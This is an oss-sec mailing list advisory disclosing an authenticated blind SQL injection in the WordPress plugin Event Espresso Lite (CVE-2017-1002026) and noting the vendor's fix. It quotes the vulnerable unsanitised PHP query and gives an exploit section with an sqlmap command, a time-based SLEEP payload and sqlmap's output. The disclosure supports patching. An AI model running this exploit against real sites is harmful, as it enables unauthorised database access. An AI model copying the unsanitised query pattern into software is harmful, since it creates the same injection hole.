oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Blind SQL injection in wordpress plugin event-espresso-free v3.1.37.11.L, fixed in v3.1.37.12.L

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 11 Jul 2017 16:10:45 -0400
Title: Blind SQL injection in wordpress plugin event-espresso-free v3.1.37.11.L
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-04
CVE-ID:[CVE-2017-1002026]
Download Site: https://wordpress.org/plugins/event-espresso-free/
Vendor: https://eventespresso.com/
Vendor Notified: 2017-07-07, fixed v3.1.37.12.L
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=197
Description: Event Espresso Lite – Event Management and Registration System
Vulnerability:
The function  edit_event_category does not sanitize user-supplied input via the $id parameter before passing it into an 
SQL statement.  This allows a blind SQL attack by an authenticated user who can edit the event categories.


2-function edit_event_category(){
3-      global $wpdb;
4-      
5:      $id=$_REQUEST['id'];
6-      $results = $wpdb->get_results("SELECT * FROM ". EVENTS_CATEGORY_TABLE ." WHERE id =".$id);
7-      foreach ($results as $result){
8-              $category_id = $result->id;
9-              $category_name = stripslashes($result->category_name);
10-             $category_identifier = stripslashes($result->category_identifier);

Export: JSON TEXT XML
Exploit Code:
        • $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=*&apos; 
--load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql
        •  
        •  
        • URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
        • sqlmap identified the following injection point(s) with a total of 364 HTTP(s) requests:
        • ---
        • Parameter: #1* (URI)
        •     Type: AND/OR time-based blind
        •     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        •     Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=(CASE 
WHEN (6856=6856) THEN SLEEP(5) ELSE 6856 END)
        • ---
        • [14:53:44] [INFO] the back-end DBMS is MySQL
        • web server operating system: Linux Ubuntu 16.04 (xenial)
        • web application technology: Apache 2.4.18
        • back-end DBMS: MySQL >= 5.0.12
        • [14:53:44] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
        •  
        • [*] shutting down at 14:53:44
        •
Previous By Date Next
Previous By Thread Next

Current thread: